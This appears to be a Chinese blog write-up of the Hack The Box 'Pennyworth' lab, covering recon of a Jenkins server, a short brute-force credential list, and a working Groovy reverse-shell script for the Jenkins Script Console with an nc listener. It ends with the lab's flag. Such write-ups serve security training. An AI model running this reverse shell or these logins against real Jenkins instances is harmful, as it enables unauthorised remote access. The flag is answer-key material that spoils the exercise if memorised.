本文主要是介绍[StartingPoint][Tier1]Pennyworth,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Important
Jenkins是一个用于自动化构建、测试和部署软件项目的开源持续集成和持续部署(CI/CD)工具。它允许开发团队自动执行和监控在软件开发过程中的重复性任务,例如构建代码、运行测试、部署应用程序等。Jenkins提供了一个易于使用的Web界面,可以配置各种任务和工作流,并通过插件系统扩展其功能,以满足不同团队和项目的需求。Jenkins的灵活性和可扩展性使其成为许多开发团队的首选工具,用于构建和交付高质量的软件。
Task 1
What does the acronym CVE stand for?
(CVE的全称?)
Common Vulnerabilities and Exposures
Task 2
What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?
(在网络安全中CIA分别代表什么意思?)
Confidentiality, Integrity, Availability
Task 3
What is the version of the service running on port 8080?
(8080端口上运行的服务版本是多少?)
# nmap -sC -sV 10.129.141.102 -p 8080
Jetty 9.4.39.v20210325
Task 4
What version of Jenkins is running on the target?
(服务端运行的Jenkins是哪个版本?)
$ curl "http://10.129.141.102:8080/error" | grep "version"
或则访问页面
2.289.1
Task 5
What type of script is accepted as input on the Jenkins Script Console?
(在Jenkins脚本控制台,输入的是什么类型的脚本?)
Burp 爆破
-username-
admin
root
test
guest
-password-
admin123
root
password
qwerty123
Groovy
Task 6
What would the “String cmd” variable from the Groovy Script snippet be equal to if the Target VM was running Windows?
(如果目标虚拟机正在运行 Windows,那么 Groovy 脚本片段中的 ‘String cmd’ 变量将等于什么?)
cmd.exe
Task 7
What is a different command than “ip a” we could use to display our network interfaces’ information on Linux?
(除了 ‘ip a’ 命令外,我们还可以使用哪个命令在 Linux 上显示网络接口的信息?)
ifconfig
Task 8
What switch should we use with netcat for it to use UDP transport mode?
(netcat用什么选项可以用udp传输)
-u
Task 9
What is the term used to describe making a target host initiate a connection back to the attacker host?
(受害者反向连接攻击者主机,那么这个是什么专业术语)
reverse shell
Flag
nc监听10032端口
$ nc -lvnp 10032
反向shell脚本
String host="{your_IP}";
int port=10032;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
到Dashboard->Manage Jenkins->Script Console
9cdfb439c7876e703e307864c9167a15
这篇关于[StartingPoint][Tier1]Pennyworth的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![[StartingPoint][Tier2]Included](https://img-blog.csdnimg.cn/img_convert/38f16309a0218758905767f3d2ad38a9.jpeg)
![[StartingPoint][Tier2]Unified](https://img-blog.csdnimg.cn/img_convert/699967a8fe0484db30ae6221cbed3882.jpeg)
![[StartingPoint][Tier2]Archetype](https://img-blog.csdnimg.cn/img_convert/4db13216eba6070eb871d3b62c8b450b.jpeg)
![[StartingPoint][Tier1]Ignition](https://img-blog.csdnimg.cn/img_convert/904aed5be44e8e96e605cf833ec5b709.jpeg)
![[StartingPoint][Tier1]Sequel](https://img-blog.csdnimg.cn/img_convert/48667436d3d84495d3fcb7e7933f7a86.jpeg)
![[StartingPoint][Tier1]Crocodile](https://img-blog.csdnimg.cn/img_convert/6a6e016ae303f164f5fb76e63ec0f07b.jpeg)
![[StartingPoint][Tier0]Mongod](https://img-blog.csdnimg.cn/img_convert/997753f1acff7aea095e7c06a78a0179.jpeg)
![[StartingPoint][Tier0]Dancing](https://img-blog.csdnimg.cn/img_convert/ffaea85f8aa2936d7549a6774d32f8d3.jpeg)
![[StartingPoint][Tier0]Explosion](https://img-blog.csdnimg.cn/img_convert/14f9fb0cf0b8c888f3ca58feebed61cf.jpeg)